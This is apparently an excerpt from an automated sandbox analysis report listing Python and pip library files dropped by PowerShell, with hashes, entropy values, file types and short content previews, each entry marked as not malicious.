                                                                                                    SHA-512:F40C622FC62218FD411072106B1F0572B885D3E72FFFE16AB191523925D4B182DFCBCA008D98784C17FFCE82741B16A98C4747DDFE2BE4F26372C965A97653E5
                                                                                                    Malicious:false
                                                                                                    Preview:import warnings......warnings.warn(.. "lib2to3 package is deprecated and may not be able to parse Python 3.10+",.. DeprecationWarning,.. stacklevel=2,..)..
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):71
                                                                                                    Entropy (8bit):4.373141971794576
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:JSn33FLIEMxMXBc+cBOG8Ld:knFL5MxMxBwwd
                                                                                                    MD5:6E63E558657EDF8A52EF723F1FAB575E
                                                                                                    SHA1:5697F6C2626C26A5B8064F02218C476C47BF2349
                                                                                                    SHA-256:E34BC92BC4A3A20A1DCB7FBE0FF28E7888C9BC5199EC192DC0E763DD5F050D40
                                                                                                    SHA-512:47E75A8BB6ACB7D51B328963C133EE140214DB53F992F6607EC83978591E7C5B83FF658348D5CA23D2D3689ED901A99EFFB9A9519EDB6DA8EF56960E70E5EF4A
                                                                                                    Malicious:false
                                                                                                    Preview:import sys..from .main import main....sys.exit(main("lib2to3.fixes"))..
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):6786
                                                                                                    Entropy (8bit):4.2056810193877405
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:5LZ23V6exALGbH1tz/ccERr3+tzB1NgU/FL93eCjMy0PuCjWl4D7H2R6I:u5K6/FL93eCjMPmCj+bR6I
                                                                                                    MD5:9FEAF597DF4589DAF018E8A4D9DE23AA
                                                                                                    SHA1:E3C21EAF4DEA2DBDD9A4BA5A36330E600002022A
                                                                                                    SHA-256:344AE77CA1E51F6919D34884B6CDD64849DDE851ECBF9F4D9EFC8C772545977B
                                                                                                    SHA-512:DA71A37B48438CC0140BB0F43516749FAD76648AF25CAEB71DB5D8F1DF70C109696153392B974E55E002002EDDD733C873D60D4661F9636C72571833BA9848C0
                                                                                                    Malicious:false
                                                                                                    Preview:"""A bottom-up tree matching algorithm implementation meant to speed..up 2to3's matching process. After the tree patterns are reduced to..their rarest linear path, a linear Aho-Corasick automaton is..created. The linear automaton traverses the linear paths from the..leaves to the root of the AST and returns a set of nodes for further..matching. This reduces significantly the number of candidate nodes."""....__author__ = "George Boutsioukis <gboutsioukis@gmail.com>"....import logging..import itertools..from collections import defaultdict....from . import pytree..from .btm_utils import reduce_tree....class BMNode(object):.. """Class for a node of the Aho-Corasick automaton used in matching""".. count = itertools.count().. def __init__(self):.. self.transition_table = {}.. self.fixers = [].. self.id = next(BMNode.count).. self.content = ''....class BottomMatcher(object):.. """The main matcher class. After instantiating the patterns should.. be ad
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):10225
                                                                                                    Entropy (8bit):4.258637831249486
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:63NTnUN2QTnt1d4xWlYGw0ggx1w/2GP/Mjp7joSL/DNwpIsjew:JJlPwmx1tGMj3Ci7w
                                                                                                    MD5:D76229E5B83D42029C9995DB1B8C7ED5
                                                                                                    SHA1:96CBC1686AC134DDEB5E16D599D4FBAF88AE6B56
                                                                                                    SHA-256:11B921004E6AF9351390BE268BDCD723B7EE7607CDF6E24A353747F048B1F9D4
                                                                                                    SHA-512:2B11D749058483D0A6879DCD96D4DBC57EBA3234CC29CD3804801C8D637C3A85AED84518F8632F2DF529BB3E27D5834EC699580A8D52AA037169CBDC4C69D5BE
                                                                                                    Malicious:false
                                                                                                    Preview:"Utility functions used by the btm_matcher module"....from . import pytree..from .pgen2 import grammar, token..from .pygram import pattern_symbols, python_symbols....syms = pattern_symbols..pysyms = python_symbols..tokens = grammar.opmap..token_labels = token....TYPE_ANY = -1..TYPE_ALTERNATIVES = -2..TYPE_GROUP = -3....class MinNode(object):.. """This class serves as an intermediate representation of the.. pattern tree during the conversion to sets of leaf-to-root.. subpatterns""".... def __init__(self, type=None, name=None):.. self.type = type.. self.name = name.. self.children = [].. self.leaf = False.. self.parent = None.. self.alternatives = [].. self.group = [].... def __repr__(self):.. return str(self.type) + ' ' + str(self.name).... def leaf_to_root(self):.. """Internal method. Returns a characteristic path of the.. pattern tree. This method must be run for all leaves until the.. linea
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):6876
                                                                                                    Entropy (8bit):4.411308717114407
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:rDO1mqwWSFkEv1w5tLazO7x2dmmw1mBDog36TvEL8AupcrxmJB6CrxmJpHQ/l9/W:rCivSDDQYmx3KT28oH+2nHS0
                                                                                                    MD5:41D14A8EA6887DF17A9CAA4E37C9AD98
                                                                                                    SHA1:E9CDF58BD18562E7B29E2D263C6C5E9C58C7B1B4
                                                                                                    SHA-256:1195366080AE5114EF41253B9FF6AF99A75555FF0764BEAF390FF89213D94FC1
                                                                                                    SHA-512:C3436315C24E0438C8C6F9EB6DC22190D5DCDA30C1BC20A2D707803881ABC0BF5165C71775B400BAA7AFDB1C31BAEB786F0A6572441AEBA1D7E3733443D361A5
                                                                                                    Malicious:false
                                                                                                    Preview:# Copyright 2006 Google, Inc. All Rights Reserved...# Licensed to PSF under a Contributor Agreement....."""Base class for fixers (optional, but recommended)."""....# Python imports..import itertools....# Local imports..from .patcomp import PatternCompiler..from . import pygram..from .fixer_util import does_tree_import....class BaseFix(object):.... """Optional base class for fixers..... The subclass name must be FixFooBar where FooBar is the result of.. removing underscores and capitalizing the words of the fix name... For example, the class name for a fixer named 'has_key' should be.. FixHasKey... """.... PATTERN = None # Most subclasses should override with a string literal.. pattern = None # Compiled pattern, set by compile_pattern().. pattern_tree = None # Tree representation of the pattern.. options = None # Options object passed to initializer.. filename = None # The filename (set by set_filename).. numbers = itertools.count(1) # For new_name
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):15659
                                                                                                    Entropy (8bit):4.597718653892991
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:kS/Xt8wtJhgl02gULJSisqZsrJpsm7Bob8sBlWVU/yfzmw/u7i3xjE+/T/ydT/6h:/88cwpfhsjxnIQ16Fjz+fIyEWUSan
                                                                                                    MD5:09E8FFF7E6AF7C2CFFE608EC2985A7B6
                                                                                                    SHA1:4B6F63B2F139F1CC0B850A64ADA39B1F0782E350
                                                                                                    SHA-256:13F97833E856E26B7E77D1051D7E75B7971CE4996F05BFCCAA146C98C8732A49
                                                                                                    SHA-512:0E00574B78F81097AAA30176DF2AD3FFD597893ACFD386734083836694207D2B352D86BB162C61AAF5383C8F68070455FA951317B04CC1046B615737D0722A7E
                                                                                                    Malicious:false
                                                                                                    Preview:"""Utility functions, node construction macros, etc."""..# Author: Collin Winter....# Local imports..from .pgen2 import token..from .pytree import Leaf, Node..from .pygram import python_symbols as syms..from . import patcomp......###########################################################..### Common node-construction "macros"..###########################################################....def KeywordArg(keyword, value):.. return Node(syms.argument,.. [keyword, Leaf(token.EQUAL, "="), value])....def LParen():.. return Leaf(token.LPAR, "(")....def RParen():.. return Leaf(token.RPAR, ")")....def Assign(target, source):.. """Build an assignment statement""".. if not isinstance(target, list):.. target = [target].. if not isinstance(source, list):.. source.prefix = " ".. source = [source].... return Node(syms.atom,.. target + [Leaf(token.EQUAL, "=", prefix=" ")] + source)....def Name(name, prefix=None):.. """Return a
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):48
                                                                                                    Entropy (8bit):4.246115365169272
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:SfPIAFy6WIXtH0EEov:SS9SH9Eov
                                                                                                    MD5:3D02598F327C3159A8BE45FD28DAAC9B
                                                                                                    SHA1:78BD4CCB31F7984B68A96A9F2D0D78C27857B091
                                                                                                    SHA-256:B36AE7DA13E8CAFA693B64B57C6AFC4511DA2F9BBC10D0AC03667FCA0F288214
                                                                                                    SHA-512:C59C5B77A0CF85BB9FBF46F9541C399A9F739F84828C311CED6E270854ECCE86D266E4C8D5AA07897B48CE995C3DA29FEA994E8CD017D48E5A4FAB7A6B65E903
                                                                                                    Malicious:false
                                                                                                    Preview:# Dummy file to make this directory a package...
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2818
                                                                                                    Entropy (8bit):4.461309983570084
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:/+9xh5cEAuWUj0liK4C4O2IAqM2AJitkt0uXU9tyrIV/QRG7c/1i1eTbnQAyS:/cxh5ctun0IZyzGJiqU9orgoRGwNi1ef
                                                                                                    MD5:09657AB688E36AE6641F732999FF5E92
                                                                                                    SHA1:8E0E2F7C9AE3D859A2F11D6DBBC5F7AEA26CC1E5
                                                                                                    SHA-256:CD1559A1ACFEDAFB2B7B38FF1F784B3A131908AF5CED36F35A00BE8CE6A50F4D
                                                                                                    SHA-512:A8BE098B587C9B3CDB530BA7D5468450AFF000843A94E5AEA689A71CCAA78E763C51EBD06CF49A9B3503CFAB3B278DC487577000EA5A6541991CB738CDAA8F96
                                                                                                    Malicious:false
                                                                                                    Preview:from typing import Any, Dict, Sequence..from pip._vendor.packaging.markers import default_environment..from pip import __version__.from pip._internal.req.req_install import InstallRequirement...class InstallationReport:. def __init__(self, install_requirements: Sequence[InstallRequirement]):. self._install_requirements = install_requirements.. @classmethod. def _install_req_to_dict(cls, ireq: InstallRequirement) -> Dict[str, Any]:. assert ireq.download_info, f"No download_info for {ireq}". res = {. # PEP 610 json for the download URL. download_info.archive_info.hashes may. # be absent when the requirement was installed from the wheel cache. # and the cache entry was populated by an older pip version that did not. # record origin.json.. "download_info": ireq.download_info.to_dict(),. # is_direct is true if the requirement was a direct URL reference (which. # includes editable requi
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable
                                                                                                    Category:dropped
                                                                                                    Size (bytes):20777
                                                                                                    Entropy (8bit):4.5847812976968205
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:UTt7OjNT51GuxMgExJAvYDr3pJYQ+ebhH4Lb3GIppfT3QBHnarT3:A7UNT51rxkxmw/ZJx+YhH4Lb3G8tzQhg
                                                                                                    MD5:EB81AAD0A35DD6B2DE4C27B643E404C7
                                                                                                    SHA1:15A3B67CF3296F1DF342BACB84F02BF3FE532234
                                                                                                    SHA-256:5E2ACE006BF58E032EEEFBBCEE4B8F6E88468FB547A7056B776AB729481540D8
                                                                                                    SHA-512:EF236F8A11582F93B856F4F9888CBEDFFC30A995E1A04F567F31128CF985831EF996581B8190E7E65E5B3A273A77176CA3DA88EB6C1867A1EC0B7121039EC73D
                                                                                                    Malicious:false
                                                                                                    Preview:import functools.import itertools.import logging.import os.import posixpath.import re.import urllib.parse.from dataclasses import dataclass.from typing import (. TYPE_CHECKING,. Any,. Dict,. List,. Mapping,. NamedTuple,. Optional,. Tuple,. Union,.)..from pip._internal.utils.deprecation import deprecated.from pip._internal.utils.filetypes import WHEEL_EXTENSION.from pip._internal.utils.hashes import Hashes.from pip._internal.utils.misc import (. pairwise,. redact_auth_from_url,. split_auth_from_netloc,. splitext,.).from pip._internal.utils.models import KeyBasedCompareMixin.from pip._internal.utils.urls import path_to_url, url_to_path..if TYPE_CHECKING:. from pip._internal.index.collector import IndexContent..logger = logging.getLogger(__name__)...# Order matters, earlier hashes have a precedence over later hashes for what.# we will pick to use.._SUPPORTED_HASHES = ("sha512", "sha384", "sha256", "sha224", "sha1", "md5")...@dataclass(frozen=True)
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable
                                                                                                    Category:dropped
                                                                                                    Size (bytes):738
                                                                                                    Entropy (8bit):4.455127026433689
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:QCBhJAYp5FaREQr4GtXUSd7mry13LElvv1sydX/YwcjcFCbP:DhRLwHUEdCry130sOejcQ7
                                                                                                    MD5:77B8766C2C20290FC2545CB9F68E64EB
                                                                                                    SHA1:FC639818C98AB821887BD5AE95FD49DED2D8634A
                                                                                                    SHA-256:DC4150A7F202BBFB211F5F9306A865D1002EB0A08F0C53A580715E3785E8C16B
                                                                                                    SHA-512:BE0B3E58A796077E457526ABE8C9E1EE7D3D5707B588DB4E655BA454546DE0366189C34811954680E2CFE6172F04DD4BD6AF4FEE4599BADD63FF0126A5A344EF
                                                                                                    Malicious:false
                                                                                                    Preview:""".For types associated with installation schemes...For a general overview of available schemes and their context, see.https://docs.python.org/3/install/index.html#alternate-installation.."""...SCHEME_KEYS = ["platlib", "purelib", "headers", "scripts", "data"]...class Scheme:. """A Scheme holds paths which are used as the base directories for. artifacts associated with a Python package.. """.. __slots__ = SCHEME_KEYS.. def __init__(. self,. platlib: str,. purelib: str,. headers: str,. scripts: str,. data: str,. ) -> None:. self.platlib = platlib. self.purelib = purelib. self.headers = headers. self.scripts = scripts. self.data = data.
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4643
                                                                                                    Entropy (8bit):4.246322915605786
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:WxeLxlCN2huvcRLnU6rgU0Sgb6LhqqqlAeQEW4aL79B1sOp8DMUPD7iGKzK0MLwj:VxlCNRkRbJG6FSlArn4a/tIrL0Mi9
                                                                                                    MD5:3BC5A1B39721B6B06248F40CBEBB40D9
                                                                                                    SHA1:6EC69D7090B207E5B202989ACD581D0B86A0118D
                                                                                                    SHA-256:012572C99C622482F0EDB4C8555A49C7C276F773371E4E45DF78A51A7D1EF347
                                                                                                    SHA-512:8DF2CB44F070630447205681F141E457B3900C1AE4582C40B3A0ECDF666DCBC667E8EE9B1D6D60BC32AC4260BBEE697A04DDB0E689A056091AC218A5EAE355DC
                                                                                                    Malicious:false
                                                                                                    Preview:import itertools.import logging.import os.import posixpath.import urllib.parse.from typing import List..from pip._vendor.packaging.utils import canonicalize_name..from pip._internal.models.index import PyPI.from pip._internal.utils.compat import has_tls.from pip._internal.utils.misc import normalize_path, redact_auth_from_url..logger = logging.getLogger(__name__)...class SearchScope:.. """. Encapsulates the locations that pip is configured to search.. """.. __slots__ = ["find_links", "index_urls", "no_index"].. @classmethod. def create(. cls,. find_links: List[str],. index_urls: List[str],. no_index: bool,. ) -> "SearchScope":. """. Create a SearchScope object after normalizing the `find_links`.. """. # Build find_links. If an argument starts with ~, it may be. # a local file relative to a home directory. So try normalizing. # it and if it exists, use the normalized version.. # This is del
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1907
                                                                                                    Entropy (8bit):4.375302448918886
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:1REm/+RAsQ8GYLRvBo2qBVP2XMglzB7QMaqn7V4eMQKuIgrGIpshf/Pg7d7l05IW:SAG1iVglQONze/Y2
                                                                                                    MD5:A9FA37FF60BA1523C11FD12AF309E711
                                                                                                    SHA1:64627B9F7F60ADD87CFE2D2B107D262480AAB44E
                                                                                                    SHA-256:299762EBA82C47EFD151752BF6E7A3B2C937AE64C7AD054959E340DAC57E5526
                                                                                                    SHA-512:DA77858C1164B41B596907B9323573DE1B7870F75B434A407E3652E97B13668238EF4F1A99D77727E7DF7043F8A4C61F6965458768ADDB7AC0824C6CEAEEDBA8
                                                                                                    Malicious:false
                                                                                                    Preview:from typing import Optional..from pip._internal.models.format_control import FormatControl...class SelectionPreferences:. """. Encapsulates the candidate selection preferences for downloading. and installing files.. """.. __slots__ = [. "allow_yanked",. "allow_all_prereleases",. "format_control",. "prefer_binary",. "ignore_requires_python",. ].. # Don't include an allow_yanked default value to make sure each call. # site considers whether yanked releases are allowed. This also causes. # that decision to be made explicit in the calling code, which helps. # people when reading the code.. def __init__(. self,. allow_yanked: bool,. allow_all_prereleases: bool = False,. format_control: Optional[FormatControl] = None,. prefer_binary: bool = False,. ignore_requires_python: Optional[bool] = None,. ) -> None:. """Create a SelectionPreferences object... :param allow_yank
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4272
                                                                                                    Entropy (8bit):4.305122138474475
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:kc9EQKRRanYetfd3atqSKpclTqQPEfheKckjXiOf3N08lsqHpadDPcfAzLGXN8Ln:kc7Kj7e9tatQpclTqQPLK0uVOPoKQLWV
                                                                                                    MD5:2DF3C0F383CD9A90B1C6EC3785F267EC
                                                                                                    SHA1:479A26A092F77A856B804A38331A6B8D2440CFC6
                                                                                                    SHA-256:DF8124A2BACCB91BD1A7E6E3A87289F9B38EEF59BDC5D8CDD9BF16585102D875
                                                                                                    SHA-512:83A41BA6F48A235E75B8B97EFBF64DC777B24E92E1D011E6403C326891040AF544047CE1FBE41417DBDC6EBD5755D612B3D98CC68B1729A3FAB48A545E3937F7
                                                                                                    Malicious:false
                                                                                                    Preview:import sys.from typing import List, Optional, Set, Tuple..from pip._vendor.packaging.tags import Tag..from pip._internal.utils.compatibility_tags import get_supported, version_info_to_nodot.from pip._internal.utils.misc import normalize_version_info...class TargetPython:.. """. Encapsulates the properties of a Python interpreter one is targeting. for a package install, download, etc.. """.. __slots__ = [. "_given_py_version_info",. "abis",. "implementation",. "platforms",. "py_version",. "py_version_info",. "_valid_tags",. "_valid_tags_set",. ].. def __init__(. self,. platforms: Optional[List[str]] = None,. py_version_info: Optional[Tuple[int, ...]] = None,. abis: Optional[List[str]] = None,. implementation: Optional[str] = None,. ) -> None:. """. :param platforms: A list of strings or None. If None, searches for. packages that are supported by the
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable
                                                                                                    Category:dropped
                                                                                                    Size (bytes):3600
                                                                                                    Entropy (8bit):4.5473966910251695
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:LwCUcYKBjGYBcAkEOYKiKV/8N1lE/GNLnxP1:VJBiBUE/Gr1
                                                                                                    MD5:A6E4DE72BC628633E4AC9598B55EA9E7
                                                                                                    SHA1:CF55FF5F5C3457AD21CFB24F341871B7378A4197
                                                                                                    SHA-256:62A6B3A0867299AFD0D5E8C56B50BB3472904515A5BD691D2BDE9544A98305E2
                                                                                                    SHA-512:8862E0663343C8B476C1EB5BEEBD7CE0FF05B3D43772F9B221CEF20EFDF8F148D0B77B4701454647C5BFF1C7034C4FE344B8B80F094845BAB5475BB3B6361C57
                                                                                                    Malicious:false
                                                                                                    Preview:"""Represents a wheel file and provides access to the various parts of the.name that have meaning..""".import re.from typing import Dict, Iterable, List..from pip._vendor.packaging.tags import Tag..from pip._internal.exceptions import InvalidWheelFilename...class Wheel:. """A wheel file""".. wheel_file_re = re.compile(. r"""^(?P<namever>(?P<name>[^\s-]+?)-(?P<ver>[^\s-]*?)). ((-(?P<build>\d[^-]*?))?-(?P<pyver>[^\s-]+?)-(?P<abi>[^\s-]+?)-(?P<plat>[^\s-]+?). \.whl|\.dist-info)$""",. re.VERBOSE,. ).. def __init__(self, filename: str) -> None:. """. :raises InvalidWheelFilename: when the filename is invalid for a wheel. """. wheel_info = self.wheel_file_re.match(filename). if not wheel_info:. raise InvalidWheelFilename(f"{filename} is not a valid wheel filename."). self.filename = filename. self.name = wheel_info.group("name").replace("_", "-"). # we'll assume "_" means "-" due to whe
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable
                                                                                                    Category:dropped
                                                                                                    Size (bytes):50
                                                                                                    Entropy (8bit):4.1288840705376355
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:5WFVQtGSKH4F0MzDv:YQtG5YiMfv
                                                                                                    MD5:3893F116D94097C4AE72769A5F7C21F7
                                                                                                    SHA1:CC7B633895C11040D0B99E7D0575B1D031652035
                                                                                                    SHA-256:8DFE93B799D5FFBCE401106B2A88C85C8B607A3BE87A054954A51B8406B92287
                                                                                                    SHA-512:924BC4A7222FC638FC8FAB4A6E7AEA876E25DCD355AFF628AA21A77BA0ECE90E774FA75D1797CFE688B7129626AAE395662489419AD53CAB4A842367FE97BCB8
                                                                                                    Malicious:false
                                                                                                    Preview:"""Contains purely network-related utilities..""".
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):263
                                                                                                    Entropy (8bit):5.12966968419851
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:r18aCCVmXQtG5YiMh/Z6B0Wltwn23d6oAreKAsShMR6IaYleHXlll:GaCCMXVYic6BvPxImblMRjaYkH1ll
                                                                                                    MD5:2C201F832F87EDBC1196D6730518227F
                                                                                                    SHA1:EF2B2A43846E4FB63108BE880F4555F6952CCB77
                                                                                                    SHA-256:8DE3833DC1C61D3572189F0C688A5C55B021F42483C981A4F57CE21CFC82B476
                                                                                                    SHA-512:853BAA6052460BA892B01F647BA09CCD6D598C07A3676081E05752D5CFD7392348405BD3AFFA8C962C960EE966F5151D5FCEFBAD05B014F979B5FD63D997EE9E
                                                                                                    Malicious:false
                                                                                                    Preview:........=.Cf2...............................d.Z.y.).z+Contains purely network-related utilities..N)...__doc__........jC:\Users\boadi\AppData\Local\Programs\Python\Python312\Lib\site-packages\pip/_internal/network/__init__.py..<module>r........s..............r....
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):22005
                                                                                                    Entropy (8bit):5.366434828973916
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:7HtN0q2zfeqFDTXfadOA3Z7eNkgy/nYH8ka76wkhsMh/ccO2:Ltyq2P9Tm7eNkgyb5wsMh/cF2
                                                                                                    MD5:CCC11CD1CED1DD60049EF8F0451F10EB
                                                                                                    SHA1:1F1EA1A37B0DF17263886778D65F1E492353F2FC
                                                                                                    SHA-256:CAB3BDEB1BE93EFEB8F0BDA2D7091B7849A8DD051C7C59C7DE6B62310B6236BF
                                                                                                    SHA-512:E54943E5BEDBBE75A2EDFFC96CC16D1B552102B2CCFD50691A67C931134C0683D2458DF0E20AEFB87916E7E8DD7475557B5AACD0DCD961CF35600B01DF13727F
                                                                                                    Malicious:false
                                                                                                    Preview:........=.Cf=P.............................d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l m!Z!..d.d.l"m#Z#m$Z$m%Z%m&Z&m'Z'..d.d.l(m)Z)....e!e*........Z+d.a,..G.d...d.e.........Z-..G.d...d.e.........Z...G.d...d.e.........Z/..G.d...d.e.........Z0..G.d...d.e.........Z1..e.d...........d.e2d.e.f.d...........Z3..G.d...d.e.........Z4y.).z.Network Authentication Helpers..Contains interface (MultiDomainBasicAuth) and associated glue code for.providing credentials in the context of network requests.......N)...ABC..abstractmethod)...lru_cache)...commonprefix)...Path)...Any..Dict..List..NamedTuple..Optional..Tuple)...AuthBase..HTTPBasicAuth)...Request..Response)...get_netrc_auth)...getLogger)...ask..ask_input..ask_password..remove_auth_from_url..split_auth_netloc_from_url)...AuthInfoFc.....................,.....e.Z.d.Z.U.e.e.d.<...e.e.d.<...e.e.d.<...y
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):6527
                                                                                                    Entropy (8bit):5.31891868939367
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:bQkt80ENOtSKYrAdjB97K761ekKg7j03mgFPnB:0ka0ENOpLK7Me1g7I/PB
                                                                                                    MD5:5A25121D35636B022A732524F975BF9D
                                                                                                    SHA1:C58EC56039A3104BEDE91EF0F30A3237E35468EE
                                                                                                    SHA-256:AC0AD3B504C5A8B11BCB8C031AD6EF4C2CD1BE5B79B342EC1DC7234FF61ACF33
                                                                                                    SHA-512:7D26C1F11000602E0CFD9033AFFD088877EFDF03273335FBE8CFF7AD8CCFEB645EFE2AC1B8820FCC8E36B9EC89790728DC4D5A83B1F26BAD9E702A9691911D37
                                                                                                    Malicious:false
                                                                                                    Preview:........=.Cf_...............................d.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.e.d.e.f.d...Z.e.d.e.d.....f.d...........Z...G.d...d.e.........Z.y.).z.HTTP cache implementation.......N)...contextmanager)...datetime)...BinaryIO..Generator..Optional..Union)...SeparateBodyBaseCache)...SeparateBodyFileCache)...Response)...adjacent_tmp_file..replace)...ensure_dir..response..returnc...........................t.........|.d.d.........S.).N..from_cacheF)...getattr).r....s.... .gC:\Users\boadi\AppData\Local\Programs\Python\Python312\Lib\site-packages\pip/_internal/network/cache.py..is_from_cacher........s..........8.\.5..1..1.....).NNNc................#....4...K.......d.......y.#.t.........$.r...Y.y.w.x.Y.w...w.).zvIf we can't access the cache then we can just skip caching and process. requests as if caching wasn't enabled.. N)...OSError..r....r......suppressed_cache_errorsr........s...................
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):8562
                                                                                                    Entropy (8bit):5.374802796254879
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:blJI3fTWKcFJ3YHTZteuu2QZMXlW/UTGvIyjztv3:Zy3CKcFdYHuuCIWMqvZlv3
                                                                                                    MD5:C788028157FE5169B885E8D4E7472A53
                                                                                                    SHA1:3CC961263A8B903A5C9EAAD64BAF9F63DB43FBB5
                                                                                                    SHA-256:B718CD6E419F6A01C2F01A88567A92F122B49FDABFB21A46119BB0923223012E
                                                                                                    SHA-512:D3A46E9F95BDF870ACD7472453DECBD73763D296BCC9B0E84B4CDE6C1FB16B91ABE79333AE367AB3E758245ADEF6237B533586ACAEEE87E03B311E8C0C68150B
                                                                                                    Malicious:false
                                                                                                    Preview:........=.Cf...............................d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m Z ....e.jB..................e"........Z#d.e.d.e.e$....f.d...Z%d.e.d.e.d.e&d.e.e'....f.d...Z(d.e&d.e&f.d...Z)d.e&d.e&d.e&f.d...Z*d.e.d.e.d.e&f.d...Z+d.e.d.e.d.e.f.d...Z,..G.d...d.........Z-..G.d...d.........Z.y.).z)Download files with progress indicators.......N)...Iterable..Optional..Tuple)...CONTENT_CHUNK_SIZE..Response)...get_download_progress_renderer)...NetworkConnectionError)...PyPI)...Link)...is_from_cache)...PipSession)...HEADERS..raise_for_status..response_chunks)...format_size..redact_auth_from_url..splitext..resp..returnc.....................h.......t.........|.j...................d.............S.#.t.........t.........t.........f.$.r...Y.y.w.x.Y.w.).Nz.content-length)...int..headers..ValueError..KeyError..TypeError).r....s.... .jC:\Users\boadi\AppData\Loca
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):11672
                                                                                                    Entropy (8bit):5.4069467854436795
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:MFiKFuQcQoJ6E0zpnyIDLLh3fbpwAHWQfpOSsOB5qMTn:MFi9Qbo3epyMLLhTpwS0SJB5qun
                                                                                                    MD5:70FAFCDECE8B7E0ED12A35873F66D158
                                                                                                    SHA1:AAB7AC9ED0D4A7CBDC392CCA57F724F06B102A77
                                                                                                    SHA-256:24E75B60A3DCBC24F6E2B09D02A0E0037C41E36BCEFD7A354034F6DC0161C7A2
                                                                                                    SHA-512:7583C851EF32E72E844407D927C1EF88F611A8F07501AA457E8FD75AF13CC76B2A689394071551347F3F173D5092EB4BBC801359873EFBA735FE14A8CFE754A3
                                                                                                    Malicious:false
